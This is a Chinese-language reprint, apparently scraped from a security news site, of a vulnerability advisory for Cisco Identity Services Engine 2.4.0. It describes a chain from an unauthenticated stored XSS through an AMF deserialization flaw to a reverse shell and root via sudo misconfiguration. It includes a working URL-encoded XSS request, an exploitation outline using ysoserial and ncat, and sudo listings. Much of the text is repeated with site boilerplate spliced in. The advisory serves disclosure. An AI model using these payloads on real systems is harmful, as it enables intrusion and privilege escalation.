Cisco ISE：从无需身份验证的XSS到高权限远程代码执行漏洞

来源：作者：时间：2019-02-24 19:29 点击：次 我要投稿

广告位API接口通信错误，查看德得广告获取帮助

一、漏洞概要
我们发现，Cisco Identity Services Engine（ISE，身份服务引擎）存在3个漏洞，当这些漏洞被利用时，将允许未经身份验证的攻击者实现root权限并远程执行代码。第一个漏洞是存储型XSS文件上传漏洞，允许攻击者在受害者浏览器中上传并执行HTML页面。第二个是不安全的Flex AMF Java对象反序列化漏洞（CVE-2017-5641），该漏洞也是我们进行利用的漏洞。第三个是通过不正确的sudo文件权限实现权限提升，从而让本地攻击者以root身份运行代码。
二、厂商响应
Cisco已经为报告的XSS漏洞分配CVE-ID：CVE-2018-15440，并且在2019年1月9日发布了安全通告：
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190109-ise-multi-xss
三、贡献者
一位独立安全研究员Pedro Ribeiro向Beyond Security的SecuriTeam安全披露计划报告了此漏洞。
四、受影响的系统
Cisco Identity Services Engine 2.4.0版本
五、漏洞详情
5.1 存储型跨站脚本（XSS）漏洞
攻击维度：远程
在LiveLogSettingsServlet中（位于/admin/LiveLogSettingsServlet），包含存储型跨站脚本漏洞。doGet() HTTP请求处理程序将Action参数作为HTTP查询变量接收，该变量可以是“read”（读取）或“write”（写入）。
使用“write”参数，它将调用writeLiveLogSettings()函数，该函数将获取多个查询字符串变量，例如Columns、Rows、Refresh_rate和Time_period。然后，将这些查询字符串变量的内容写入/opt/CSCOcpm/mnt/dashboard/liveAuthProps.txt中，服务器将响应200 OK。
然而，这些参数未经过验证，可以包含任何文本。当Action参数等于“read”时，servlet将读取/opt/CSCOcpm/mnt/dashboard/liveAuthProps.txt文件，并使用Content-Type “text/html”将显示内容返回用户，从而导致写入到该文件的内容由浏览器呈现并执行。要发起一次简单的攻击，我们可以发送以下请求：
GET /admin/LiveLogSettingsServlet?Action=write&Columns=1&Rows=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e&Refresh_rate=1337&Time_period=1337
然后可以通过以下方式触发：
GET /admin/LiveLogSettingsServlet?Action=read HTTP/1.1
-----
HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Content-Length: 164
Server:
1
alert(1)
1337
1337
5.2 不安全的Flex AMF Java对象反序列化漏洞
攻击维度：远程
限制条件：需要在管理Web页面进行身份验证
通过向/admin/messagebroker/amfsecure发送带有随机数据的HTTP POST请求，服务器将响应200 OK和二进制数据，其中包括：
...Unsupported AMF version XXXXX...
这表示服务器在该位置具有Apache / Adobe Flex AMF（BlazeDS）终端。在服务器上运行的BlazeDS库版本为4.0.0.14931，这意味着它容易受到CVE-2017-5641的攻击，该漏洞的公开描述如下：“Apache Flex BlazeDS的早期版本（4.7.2及更早版本）没有限制默认情况下允许AMF(X)对象反序列化的类型。在反序列化过程中，由于几种已知类型具有超出预期的副作用，因此可能会发生代码执行。其他未知类型也可能会表现出这种行为。存在Java标准库的一个向量，允许攻击者触发可信的漏洞利用代码，导致对不可信数据进行Java反序列化。在第三方库中的其他已知向量，也可以用于触发远程代码执行。”
该漏洞此前在DrayTek VigorACS中被Agile信息安全团队进行了漏洞利用展示，详情可以参见文末参考文章的[3]和[4]。有关该漏洞的更多详细信息，请参阅[5]、[6]和[7]。
漏洞利用链的工作方式与前一个相同：
a) 如[6]中所述，将AMF二进制Payload发送到/admin/messagebroker/amfsecure，从而触发对攻击者的Java远程方法协议（JRMP）回调。
b) 使用ysoserial的JRMP监听器[8]，接收JRMP连接。
c) 使用ROME Payload调用ysoserial，因为ROME的易受攻击版本（1.0 RC2）位于服务器的Java类路径中。
d) 执行ncat（二进制文件位于ISE虚拟设备上），并返回一个作为iseaminportal用户运行的反向Shell。
5.3 通过不正确的sudo文件权限进行权限提升
攻击维度：本地
限制条件：需要以iseadminportal用户身份运行的命令Shell
Iseadminportal用户可以通过sudo（sudo –l的输出）以root身份运行各种命令：
(root) NOPASSWD: /opt/CSCOcpm/bin/resetMntDb.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/resetMnTSessDir.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/setdbpw.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/sync_export.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/sync_import.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/partial_sync_export.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/partial_sync_import.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/partial_sync_cleanup.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/ttcontrol.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/updatewallet.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/log-list.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/file-info.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/delete-log-file.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/debug-log-config.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/showinv.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/isebackupcancel.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/nssutils.sh *

[1] [2] [3] [4] 下一页

www.wnhack.com

GET /admin/LiveLogSettingsServlet?Action=write&Columns=1&Rows=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e&Refresh_rate=1337&Time_period=1337
然后可以通过以下方式触发：
GET /admin/LiveLogSettingsServlet?Action=read HTTP/1.1
-----
HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Content-Length: 164
Server:
1
alert(1)
1337
1337
5.2 不安全的Flex AMF Java对象反序列化漏洞
攻击维度：远程
限制条件：需要在管理Web页面进行身份验证
通过向/admin/messagebroker/amfsecure发送带有随机数据的HTTP POST请求，服务器将响应200 OK和二进制数据，其中包括：
...Unsupported AMF version XXXXX...
这表示服务器在该位置具有Apache / Adobe Flex AMF（BlazeDS）终端。在服务器上运行的BlazeDS库版本为4.0.0.14931，这意味着它容易受到CVE-2017-5641的攻击，该漏洞的公开描述如下：“Apache Flex BlazeDS的早期版本（4.7.2及更早版本）没有限制默认情况下允许AMF(X)对象反序列化的类型。在反序列化过程中，由于几种已知类型具有超出预期的副作用，因此可能会发生代码执行。其他未知类型也可能会表现出这种行为。存在Java标准库的一个向量，允许攻击者触发可信的漏洞利用代码，导致对不可信数据进行Java反序列化。在第三方库中的其他已知向量，也可以用于触发远程代码执行。” 本文来自无奈人生安全网
该漏洞此前在DrayTek VigorACS中被Agile信息安全团队进行了漏洞利用展示，详情可以参见文末参考文章的[3]和[4]。有关该漏洞的更多详细信息，请参阅[5]、[6]和[7]。
漏洞利用链的工作方式与前一个相同：
a) 如[6]中所述，将AMF二进制Payload发送到/admin/messagebroker/amfsecure，从而触发对攻击者的Java远程方法协议（JRMP）回调。
b) 使用ysoserial的JRMP监听器[8]，接收JRMP连接。
c) 使用ROME Payload调用ysoserial，因为ROME的易受攻击版本（1.0 RC2）位于服务器的Java类路径中。
d) 执行ncat（二进制文件位于ISE虚拟设备上），并返回一个作为iseaminportal用户运行的反向Shell。
5.3 通过不正确的sudo文件权限进行权限提升
攻击维度：本地
限制条件：需要以iseadminportal用户身份运行的命令Shell
Iseadminportal用户可以通过sudo（sudo –l的输出）以root身份运行各种命令：
(root) NOPASSWD: /opt/CSCOcpm/bin/resetMntDb.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/resetMnTSessDir.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/setdbpw.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/sync_export.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/sync_import.sh *

(root) NOPASSWD: /opt/CSCOcpm/bin/partial_sync_export.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/partial_sync_import.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/partial_sync_cleanup.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/ttcontrol.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/updatewallet.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/log-list.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/file-info.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/delete-log-file.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/debug-log-config.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/showinv.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/isebackupcancel.sh *
(root) NOPASSWD: /opt/CSCOcpm/bin/nssutils.sh *
本文来自无奈人生安全网

[1] [2] [3] [4] 下一页

本文来自无奈人生安全网

。 (责任编辑：admin)

【声明】:无奈人生安全网(http://www.wnhack.com)登载此文出于传递更多信息之目的，并不代表本站赞同其观点和对其真实性负责，仅适于网络安全技术爱好者学习研究使用，学习中请遵循国家相关法律法规。如有问题请联系我们，联系邮箱472701013@qq.com，我们会在最短的时间内进行处理。

上一篇：CVE-2019-3462：Linux APT存在远程代码执行漏洞【返回网站首页】【进入网站论坛】

下一篇：Numpy反序列化命令执行(CVE-2019-6446)浅析

当前位置：无奈人生安全网 > 漏洞预警 > 漏洞公告 > Cisco ISE：从无需身份验证的XSS到高权限远程代码执行漏洞

Cisco ISE：从无需身份验证的XSS到高权限远程代码执行漏洞